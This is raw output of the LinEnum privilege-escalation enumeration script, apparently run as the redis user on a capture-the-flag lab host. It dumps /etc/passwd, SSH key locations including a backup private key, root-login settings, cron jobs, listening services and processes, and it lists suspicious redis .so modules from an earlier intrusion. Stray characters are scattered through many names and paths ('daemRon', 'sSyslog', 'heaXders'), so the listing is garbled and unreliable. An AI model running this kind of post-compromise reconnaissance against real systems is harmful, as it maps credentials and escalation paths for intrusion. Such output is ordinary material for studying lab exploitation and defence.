gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(uuidd) gid=109(uuidd) 
groups=109(uuidd) uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(Matt) gid=1000(Matt) groups=1000(Matt) uid=107(redis) gid=114(redis) groups=114(redis) [-] It looks like we have some admin users: uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemRon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin sSyslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin Matt:x:1000:1000:,,,:/home/Matt:/bin/bash redis:x:107:114::/var/lib/redis:/bin/bash [-] Super user account(s): root [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Sep 11 2019 . drwxr-xr-x 22 root root 4.0K Aug 25 2019 .. 
drwxr-xr-x 6 Matt Matt 4.0K Sep 11 2019 Matt [-] Files owned by our user: -rw-rw---- 1 redis redis 4 Jul 13 18:55 /run/redis/redis-server.pid -rw-r----- 1 redis redis 58859 Oct 29 2019 /etc/redis/redis.conf -rwxrwxr-x 1 redis redis 46631 Jul 13 19:54 /tmp/LinEnum.sh -rw-rw-r-- 1 redis redis 5315 Jul 13 19:59 /tmp/output.txt -rw-rw---- 1 redis redis 32772 Jul 13 19:52 /var/log/redis/redis-server.log -rw-r----- 1 redis redis 46760 Aug 25 2019 /var/lib/redis/ibortfgqT.so -rw------- 1 redis redis 399 Oct 25 2019 /var/lib/redis/.bash_history -rw-rw---- 1 redis redis 683 Jul 13 19:52 /var/lib/redis/.ssh/authorized_keys -rw-r----- 1 redis redis 46760 Aug 26 2019 /var/lib/redis/dkixshbr.so -rw-r----- 1 redis redis 46760 Aug 25 2019 /var/lib/redis/vlpaulhk.so -rw-r--r-- 1 redis redis 0 Aug 25 2019 /var/lib/redis/.cache/motd.legal-displayed -rw-r----- 1 redis redis 440656 Aug 25 2019 /var/lib/redis/module.o -rw-r----- 1 redis redis 46760 Aug 25 2019 /var/lib/redis/qcbxxlig.so -rw-rw---- 1 redis redis 683 Jul 13 19:44 /var/lib/redis/authorized_keys -rw-rw---- 1 redis redis 92 Jul 13 19:40 /var/lib/redis/dump.rdb [-] Hidden files: -rw-r--r-- 1 root root 0 Jul 13 18:55 /run/network/.ifstate.lock -rw-r--r-- 1 Matt Matt 3771 Aug 25 2019 /home/Matt/.bashrc -rw------- 1 Matt Matt 1676 Sep 11 2019 /home/Matt/.bash_history -rw-rw-r-- 1 Matt Matt 66 Aug 26 2019 /home/Matt/.selected_editor -rw-r--r-- 1 Matt Matt 807 Aug 25 2019 /home/Matt/.profile -rw-rw-r-- 1 UMatt Matt 181 Aug 25 2019 /home/Matt/.wget-hsts -rw-r--r-- 1 Matt Matt 220 Aug 25 2019 /home/Matt/.bash_logout -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.d/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.hourly/.placeholder -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc -rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile -rw-r--r-- 1 root root 220 Apr 4 2018 
/etc/skel/.bash_logout -rw-r--r-- 1 root root 1531 Aug 24 2019 /etc/apparmor.d/cache/.features -rw-r--r-- 1 root root 102 Nov 16 2017 /etc/cron.daily/.placeholder -rw------- 1 root root 0 Aug 24 2019 /etc/.pwd.lock -rw-r--r-- 1 root root 118 May 5 2019 /usr/share/webmin/smf/images/.del-left.gif-Dec-05-04 -rw-r--r-- 1 root root 31 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 root root 154 Jan 28 2018 /usr/src/linuxV-headers-4.15.0-58/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 13 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/basic/.gitignore -rw-r--r-- 1 root root 55 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/mod/.gitignore -rw-r--r-- 1 root root 162 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/.gitignore -rw-r--r-- 1 root root 33 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/genksyms/.gitignore -rw-r--r-- 1 root root 24 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/gcc-plugins/.gitignore -rw-r--r-- 1 root root 21 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 54 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/dtc/.gitignore -rw-r--r-- 1 root root 25 Jan 28 2018 /usr/src/linux-headers-4.15.0-58/scripts/gdb/linux/.gitignore -rw-r--r-- 1 root root 13740 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-genWeric/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 65952 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.cache.mk -rw-r--r-- 1 root root 217265 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.config.old -rw-r--r-- 1 root root 22 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.12725.d -rw-r--r-- 1 root root 217141 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.config -rw-r--r-- 1 root root 4128 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.fixdep.o.d -rw-r--r-- 1 root root 1815 
Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.objtool-in.o.cmd -rw-r--r-- 1 root root 7068 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.builtin-check.o.cmd -rw-r--r-- 1 root root 7780 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.special.o.cmd -rw-r--r-- 1 root root 8146 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.run-command.o.cmd -rw-r--r-- 1 root root 5702 Aug 6 2019 /usr/src/linux-heaXders-4.15.0-58-generic/tools/objtool/.libstring.o.cmd -rw-r--r-- 1 root root 7893 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.orc_gen.o.cmd -rw-r--r-- 1 root root 6249 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.objtool.o.cmd -rw-r--r-- 1 root root 7139 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.help.o.cmd -rw-r--r-- 1 root root 5008 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.fixdep.o.cmd -rw-r--r-- 1 root root 7330 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.builtin-orc.o.cmd -rw-r--r-- 1 root root 7969 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.check.o.cmd -rw-r--r-- 1 root root 1265 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.libsubcmd-in.o.cmd -rw-r--r-- 1 root root 6517 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.exec-cmd.o.cmd -rw-r--r-- 1 root root 5880 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-Ygeneric/tools/objtool/.sigchain.o.cmd -rw-r--r-- 1 root root 8207 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.orc_dump.o.cmd -rw-r--r-- 1 root root 6307 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.parse-options.o.cmd -rw-r--r-- 1 root root 2091 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.subcmd-config.o.cmd -rw-r--r-- 1 root root 6882 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.pager.o.cmd -rw-r--r-- 1 root root 458 Aug 6 
2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/arch/x86/.objtool-in.o.cmd -rw-r--r-- 1 root root 8549 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/arch/x86/.decode.o.cmd -rw-r--r-- 1 root root 8286 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.elf.o.cmd -rw-r--r-- 1 root root 4328 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/tools/objtool/.str_error_r.o.cmd -rw-r--r-- 1 root root 429 Aug 6 2019 /usr/src/linux-headers-4Z.15.0-58-generic/tools/objtool/.fixdep-in.o.cmd -rw-r--r-- 1 root root 962 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/.missing-syscalls.d -rw-r--r-- 1 root root 3812 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 5553 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 6321 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 110 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 6749 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.sign-file.cmd -rw-r--r-- 1 root root 3536 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 5474 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/basic/.fixdep.cmd -rw-r--r-- 1 root root 1528 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/basic/.bin2c.cmd -rw-r--r[-- 1 root root 4799 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 104 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 6454 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.devicetable-offsets.s.cmd -rw-r--r-- 1 root root 5820 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 3063 Aug 6 2019 
/usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 4820 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 3736 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 6203 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 129 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 5401 Aug\ 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.insert-sys-cert.cmd -rw-r--r-- 1 root root 4535 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.asn1_compiler.cmd -rw-r--r-- 1 root root 5861 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.extract-cert.cmd -rw-r--r-- 1 root root 4982 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/.sortextable.cmd -rw-r--r-- 1 root root 5243 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 5742 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 60043 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 9752 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.purgatory.o.cmd -rw-r--r-- 1 root root 343 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.cache.mk -rw-r--r-- 1 root root 1544 Aug 6] 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.entry64.o.cmd -rw-r--r-- 1 root root 155 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd -rw-r--r-- 1 root root 3403 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.string.o.cmd -rw-r--r-- 1 root root 1524 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.stack.o.cmd -rw-r--r-- 1 root root 1664 Aug 6 2019 
/usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.setup-x86_64.o.cmd -rw-r--r-- 1 root root 359 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.purgatory.ro.cmd -rw-r--r-- 1 root root 6445 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/purgatory/.sha256.o.cmd -rw-r--r-- 1 root root 275 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd -rw-r--r-- 1 root root 300 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/^generated/uapi/asm/.unistd_x32.h.cmd -rw-r--r-- 1 root root 280 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd -rw-r--r-- 1 root root 252 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd -rw-r--r-- 1 root root 276 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd -rw-r--r-- 1 root root 364 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd -rw-r--r-- 1 root root 252 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd -rw-r--r-- 1 root root 280 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd -rw-r--r-- 1 root root 4645 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/tools/.relocs_64.o.cmd -rw-r--r-- 1 root root 4624 Aug 6 2019 /usr/src/linux-headers-4.15.0-5_8-generic/arch/x86/tools/.relocs_common.o.cmd -rw-r--r-- 1 root root 146 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/tools/.relocs.cmd -rw-r--r-- 1 root root 4645 Aug 6 2019 /usr/src/linux-headers-4.15.0-58-generic/arch/x86/tools/.relocs_32.o.cmd -rw------- 1 redis redis 399 Oct 25 2019 /var/lib/redis/.bash_history [-] World-readable files within /home: -rw-r--r-- 1 Matt Matt 3771 Aug 25 2019 /home/Matt/.bashrc -rw-rw-r-- 1 Matt Matt 
66 Aug 26 2019 /home/Matt/.selected_editor -rw-r--r-- 1 Matt Matt 807 Aug 25 2019 /home/Matt/.profile -rw-rw-r-- 1 Matt Matt 181 Aug 25 2019 /home/Matt/.wget-hsts -rw-r--r-- 1 Matt Matt 220 Aug 25 2019 /home/Matt/.bash_logout [-] Home directory contents: total 664K drwxr-x--- 7 redis redis 4.0K Jul 13 19:44 . drwxr-xr-x 37 root root 4.0K Aug 25 2019 .. drwxr-xr-x 2 root root 4.0K Oct 25 2019 6379 -rw-rw---- 1 redis redis 683 Jul 13 19:44 authorized_keys -rw------- 1 redis redis 399 Oct 25 2019 .bash_history drwx------ 2 redis redis 4.0K Aug 25 2019 .cache -rw-r----- 1 redis redis 46K Aug 26 2019 dkixshbr.so -rw-rw---- 1 redis redis 92 Jul 13 19:40 dump.rdb drwx------ 3 redis redis 4.0K Aug 25 2019 .gnupg -rw-r----- 1 redis redis 46K Aug 25 2019 ibortfgq.so drwxrwxr-x 3 redis redis 4.0K Aug 26 2019 .local -rw-r----- 1 redis redis 431K Aug 25 2019 module.o -rw-r----- 1 redis redis 46K Aug 25 2019 qcbxxlig.so drwxr-xr-x 2 redis root 4.0K Jul 13 19:52 .ssh -rw-r----- 1 redis redis 46K Aug 25 2019 vlpaulhk.so [-] SSH keys/host information found in the following locations: -rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak -rw-rw---- 1 redis redis 683 Jul 13 19:52 /var/lib/redis/.ssh/authorized_keys -rw-rw---- 1 redis redis 683 Jul 13 19:44 /var/lib/redis/authorized_keys [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] Environment information: SSH_CONNECTION=10.10.14.10 47360 10.10.10.160 22 LANG=en_US.UTF-8 OLDPWD=/var/lib/redis XDG_SESSION_ID=6 USER=redis PWD=/tmp HOME=/var/lib/redis SSH_CLIENT=10.10.14.10 47360 22 SSH_TTY=/dev/pts/0 MAIL=/var/mail/redis SHELL=/bin/bash TERM=xterm-256color SHLVL=2 LOGNAME=redis XDG_RUNTIME_DIR=/run/user/107 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games drwxr-xr-x 2 root root 4096 Aug 25 
2019 /bin drwxr-xr-x 2 root root 4096 Oct 25 2019 /sbin drwxr-xr-x 2 root root 20480 Oct 25 2019 /usr/bin drwxr-xr-x 2 root root 4096 Apr 24 2018 /usr/games drwxr-xr-x 2 root root 4096 Aug 25 2019 /usr/local/bin drwxr-xr-x 2 root root 4096 Aug 24 2019 /usr/local/games drwxr-xr-x 2 root root 4096 Aug 24 2019 /usr/local/sbin drwxr-xr-x 2 root root 4096 Oct 25 2019 /usr/sbin [-] Available shells: # /etc/shells: valid login sheblls /bin/sh /bin/bash /bin/rbash /bin/dash [-] Current umask value: 0002 u=rwx,g=rwx,o=rx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab /etc/cron.d: total 20 drwxr-xr-x 2 root root 4096 Aug 25 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rw-r--r-- 1 root root 712 Jan 17 2018 php -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 191 Aug 24 2019 popularity-contest /etc/cron.daily: total 56 drwxr-xr-x 2 root root 4096 Aug 25 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rwxr-xr-x 1 root root 539 Jul 16 2019 apache2 -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 77 Sep 5 2008 apt-show-versions -rwxrc-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Aug 24 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. 
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Aug 24 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 16 drwxr-xr-x 2 root root 4096 Aug 24 2019 . drwxr-xr-x 81 root root 4096 Oct 25 2019 .. -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rw-r--r-- 1 root root 102 Nodv 16 2017 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Mon 2020-07-13 20:08:40 BST 9min left Mon 2020e-07-13 18:55:15 BST 1h 4min ago motd-news.timer motd-news.service Mon 2020-07-13 20:09:00 BST 9min left Mon 2020-07-13 19:39:01 BST 20min ago phpsessionclean.timer phpsessionclean.service Tue 2020-07-14 06:12:06 BST 10h left Mon 2020-07-13 18:55:15 BST 1h 4min ago apt-daily-upgrade.timer apt-daily-upgrade.service Tue 2020-07-14 11:51:32 BST 15h left Mon 2020-07-13 18:55:15 BST 1h 4min ago apt-daily.timer apt-daily.service Tue 2020-07-14 19:10:22 BST 23h left Mon 2020-07-13 19:10:22 BST 48min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2020-07-20 00:00:00 BST 6 days left Mon 2020-07-13 18:55:15 BST 1h 4min ago fstrim.timer fstrim.service n/a n/a n/a n/a ureadahead-stop.timer 
ureadahead-stop.service 7 timers listed. ### NETWORKING ########################################## [-] Network and IP info: ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.10.10.160 netmask 255.255.255.0 broadcast 10.10.10.255 inet6 dead:beef::250:56ff:feb9:5ff3 prefixlen 64 scopeid 0x0<global> inet6 fe80::250:56ff:feb9:5ff3 prefixlen 64 scopeid 0x20<link> ether 00:50:56:b9:5f:f3 txqueuelen 1000 (Ethernet) RX packets 74083 bytes 5522516 (5.5 MB) RX errors 12 dropped 66 overruns 0 frame 0 TX packets 68265 bytes 3927953 (3.9 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 10298 bytes 731772 (731.7 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 10298 bytes 731772 (731.7 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 [-] ARP history: _gateway (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on ens33 [-] Nameserver(s): nameserver 127.0.0.53 [-] Nameserver(s): Global DNSSEC NTA: 10.in-addr.arpa 16.172.in-addr.arpa 168.192.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa corp d.f.ip6.arpa home internal intranet lan local private test Link 2 (ens33) Current Scopes: none LLMNR setting: yes MulticastDNS setting: no DNSSEC setting: no DNSSEC supported: no [-] Default route: default _gateway 0.0.0.0 UG 0 0 0 ens33 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN 599/redis-server 0. 
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN i - tcp6 0 0 ::1:6379 :::* LISTEN 599/redis-server 0. tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:10000 0.0.0.0:* - udp 0 0 127.0.0.53:53 0.0.0.0:* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.9 159416 8796 ? Ss 18:55 0:02 /sbin/init splash root 2 0.0 0.0 0 0 ? j S 18:55 0:00 [kthreadd] root 4 0.0 0.0 0 0 ? I< 18:55 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 18:55 0:00 [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 18:55 0:00 [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 18:55 0:01 [rcu_sched] root 9 0.0 0.0 0 0 ? I 18:55 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 18:55 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 18:55 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 18:55 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 18:55 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? I< 18:55 0:00 [netns] root 15 0.0 0.0 0 0 ? S 18:55 0:00 [rcu_tasks_kthre] root 16 0.0 0.0 0 0 ? S 18:55 0:00 [kauditd] root 17 0.0 0.0 0 0k ? S 18:55 0:00 [khungtaskd] root 18 0.0 0.0 0 0 ? S 18:55 0:00 [oom_reaper] root 19 0.0 0.0 0 0 ? I< 18:55 0:00 [writeback] root 20 0.0 0.0 0 0 ? S 18:55 0:00 [kcompactd0] root 21 0.0 0.0 0 0 ? SN 18:55 0:00 [ksmd] root 22 0.0 0.0 0 0 ? SN 18:55 0:00 [khugepaged] root 23 0.0 0.0 0 0 ? I< 18:55 0:00 [crypto] root 24 0.0 0.0 0 0 ? I< 18:55 0:00 [kintegrityd] root 25 0.0 0.0 0 0 ? I< 18:55 0:00 [kblockd] root 26 0.0 0.0 0 0 ? I< 18:55 0:00 [ata_sff] root 27 0.0 0.0 0 0 ? I< 18:55 0:00 [md] root 28 0.0 0.0 0 0 ? I< 18:55 0:00 [edac-poller] root 29 0.0 0.0 0 0 ? I< 18:55 0:00 [devfreq_wq] root 30 0.0 0.0 l 0 0 ? I< 18:55 0:00 [watchdogd] root 32 0.0 0.0 0 0 ? I 18:55 0:02 [kworker/0:1] root 34 0.0 0.0 0 0 ? 
